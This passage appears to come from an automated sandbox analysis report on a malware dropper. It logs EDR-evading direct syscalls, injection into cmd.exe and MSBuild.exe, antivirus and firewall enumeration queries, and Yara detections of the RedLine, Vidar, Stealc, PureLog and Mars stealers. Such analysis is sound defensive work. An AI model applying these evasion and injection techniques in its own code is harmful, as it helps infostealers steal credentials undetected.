                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04209CDA
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_04209E6D SetUnhandledExceptionFilter,0_2_04209E6D
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0420A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0420A125
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_042109A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_042109A2
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00419DC7 SetUnhandledExceptionFilter,2_2_00419DC7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00417B4E
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004173DD
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C77B66C
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C77B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C77B1F7
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C92AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C92AC62
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Found direct / indirect Syscall (likely to bypass EDR)
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x456867Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0xFC5BE4
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6C158C4CJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeNtQuerySystemInformation: Direct from: 0x6C432BA4Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeNtSetInformationThread: Direct from: 0x6CCB8C4C
                            Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeNtQuerySystemInformation: Direct from: 0x3A5BE4Jump to behavior
                            Maps a DLL or memory area into another process
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                            Searches for specific processes (likely to inject)
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00415D00
                            Writes to foreign memory regions
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A551000Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 10A6008Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A551000
                            Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 855008
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.0.exe "C:\Users\user\AppData\Local\Temp\u3z0.0.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeProcess created: C:\Users\user\AppData\Local\Temp\u3z0.1.exe "C:\Users\user\AppData\Local\Temp\u3z0.1.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeProcess created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exeJump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                            Source: 4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00420063
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_004208CE
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004170F1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042099B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004202DB
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_00420326
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_004203C1
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042044E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_004174E4
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_0042069E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004207C7
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_04220C02
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04220542
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_0422058D
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04220628
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_0421774B
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220903
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220905
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_04220A2E
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_042202CA
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: GetLocaleInfoW,0_2_04220B35
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: EnumSystemLocalesW,0_2_04217358
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00414570
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\e7b0f02f VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_004143C0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_004144B0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Mars stealer
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2435217330.00000000041C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e37370000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3514d525.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e4ff10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e35198739.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e247a3.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e1537d.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e31e34dad.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.13e3517432f.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.3309717239.0000013E37370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E34F8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000000.2454770621.0000013E31D8B000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.53c00c8.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.MSBuild.exe.a00000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2531187835.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.2752907263.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fak, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ypbquxnwo, type: DROPPED
                            Yara detected Stealc
                            Source: Yara matchFile source: 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: u3z0.0.exe PID: 6300, type: MEMORYSTR
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.2.u3z0.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.3.u3z0.0.exe.41f0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000003.2058251451.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
